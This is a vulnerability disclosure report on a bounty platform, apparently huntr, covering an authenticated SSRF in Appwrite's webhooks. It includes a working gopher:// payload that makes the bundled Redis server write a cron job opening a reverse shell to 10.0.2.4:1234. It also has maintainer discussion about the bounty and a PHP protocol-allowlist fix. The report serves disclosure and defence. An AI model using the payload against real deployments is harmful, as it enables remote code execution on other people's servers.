Server-Side Request Forgery (SSRF) in appwrite/appwrite
Reported on
Oct 3rd 2021
Description
An authenticated SSRF vulnerability exists in Appwrite's webhooks / tasks feature. The gopher:// protocol can be used to cause code execution on the Redis server that ships alongside Appwrite. The attacker must know the IP address of the Redis server, which can be found by creating multiple webhooks in the 172..0. range.
Proof of Concept
Use the following payload as a webhook:
gopher://[REDIS-SERVER-IP]:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2463%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/10.0.2.4/1234%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/data%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
When the webhook is triggered:
This causes the following to be written to /data/root on the Redis server:
*/1 * * * * bash -c "sh -i >& /dev/tcp/10.0.2.4/1234 0>&1
Impact
As of writing, I am only able to execute Redis commands and cause arbitrary file writes on the Redis server.
Recommended Fix
Block the gopher:// protocol
Occurrences
projects.php L1199-L1266
No protocol validation (Update task)
projects.php L764-L816
No protocol validation (Update webhook)
projects.php L637-L698
No protocol validation (Create webhook)
projects.php L1053-L1132
No protocol validation (Create task)
Hi @admin, the email is in the security.md repository. Also, I think there's a bug with the disclosure bounty.
@haxatron - could you explain what the issue is with the bounty?
Originally it was 212.5, but when I updated the report it is 187.5. I think there may be some error in calculation when the report reaches the limit.
@haxatron - we have identified the bug and will work on resolving this as soon as possible. In the meantime, I have bumped 👊 your bounties back up again.
Fixes proposed: https://github.com/Haxatron/appwrite/commit/682198c14849105c2dcedf7fd93aeca259efe350
@admin I can't seem to select the correct branch for the fix above. The security-fix branch does not show up for me.
@haxatron - thanks for the heads up here! We do not currently have pagination of branches on the dropdown, and so will get this sorted out today for you! Once this has been deployed, you will be able to select your branch. I will keep you notified here! 🎊
Thanks! I am a noob at GitHub lol. So this is my first time hearing about pagination.
Oops, I now think you meant that there are too many branches and so huntr cannot load them all. In that case, I'll modify the fix in alphabetical order so that I can select it.
The fix is deploying now, which will allow you to select any branch. Currently, some are just missing.
Use the following payload as a webhook:
gopher://[REDIS-SERVER-IP]:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2463%0D%0A%0A%0AWRITTEN%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/data%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
When the webhook is triggered:
This causes the following to be written to the /data/root file on the Redis server:
WRITTEN
From my understanding of the project, Appwrite requires HTTP requests to be made to internal IP address ranges, hence the submitted patch only validates the protocol used for webhooks / tasks against a whitelist (http, https).
To prevent any interaction with the redis-server via the gopher protocol
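The following is an added example, written for this page and not code from Appwrite or from the reporter's patch, showing the protocol allowlist that the "Recommended Fix" section and the comment above describe: a webhook or task URL is accepted only when its scheme is http or https, so gopher://, dict://, file:// and similar URLs never reach the HTTP client. The function names (isAllowedWebhookUrl, newWebhookCurlHandle) and the sample URLs are constructed for this example. As a second layer, the curl handle is restricted with CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS so that libcurl itself refuses every protocol other than HTTP/HTTPS, including on redirects. Host checks are deliberately absent, because, as the comment above notes, Appwrite needs to reach internal addresses.

```php
<?php
// Added example (not Appwrite's own code): scheme allowlist for webhook / task URLs.
declare(strict_types=1);

// Only these schemes may be stored for a webhook or task (constructed allowlist).
const ALLOWED_WEBHOOK_SCHEMES = ['http', 'https'];

/**
 * Returns true when $url has an http/https scheme and a non-empty host.
 * Anything parse_url() cannot understand is rejected rather than guessed at.
 */
function isAllowedWebhookUrl(string $url): bool
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        // Malformed, relative, or scheme-only URLs (e.g. file:///etc/passwd has no host).
        return false;
    }

    // Schemes are case-insensitive (RFC 3986), so GOPHER:// must fail like gopher://.
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ALLOWED_WEBHOOK_SCHEMES, true)) {
        return false;
    }

    return $parts['host'] !== '';
}

/**
 * Builds a curl handle that can only ever speak HTTP/HTTPS, so a URL that slips
 * past the string check still cannot talk to Redis or any other non-HTTP service.
 * Returns false if the URL fails the allowlist or curl_init() fails.
 */
function newWebhookCurlHandle(string $url)
{
    if (!isAllowedWebhookUrl($url)) {
        return false;
    }
    $ch = curl_init($url);
    if ($ch === false) {
        return false;
    }
    // Defense in depth: restrict the initial request and any redirect target.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    return $ch;
}

// Constructed sample inputs: the first two are acceptable, the rest must be rejected.
$samples = [
    'https://hooks.example.test/appwrite'        => true,
    'http://10.0.0.20:8080/internal-task'        => true,  // internal host is allowed, scheme is http
    'gopher://10.0.0.5:6379/_%2A1%0D%0A'         => false, // the vector from this report
    'GOPHER://10.0.0.5:6379/_'                   => false, // case-insensitive scheme check
    'dict://10.0.0.5:6379/'                      => false,
    'file:///etc/passwd'                         => false, // no host component
    '//hooks.example.test/path'                  => false, // scheme-relative, no scheme
];

foreach ($samples as $url => $expected) {
    $ok = isAllowedWebhookUrl($url);
    printf("%-45s %s%s\n", $url, $ok ? 'allowed ' : 'rejected',
        $ok === $expected ? '' : '  <-- UNEXPECTED');
}
```

Run it with `php allowlist.php`; every sample should print without an UNEXPECTED marker. The string check happens at create/update time (the four projects.php occurrences listed in the report), so a bad URL is never persisted, while the curl options protect the dispatch path if URLs were stored before the check existed.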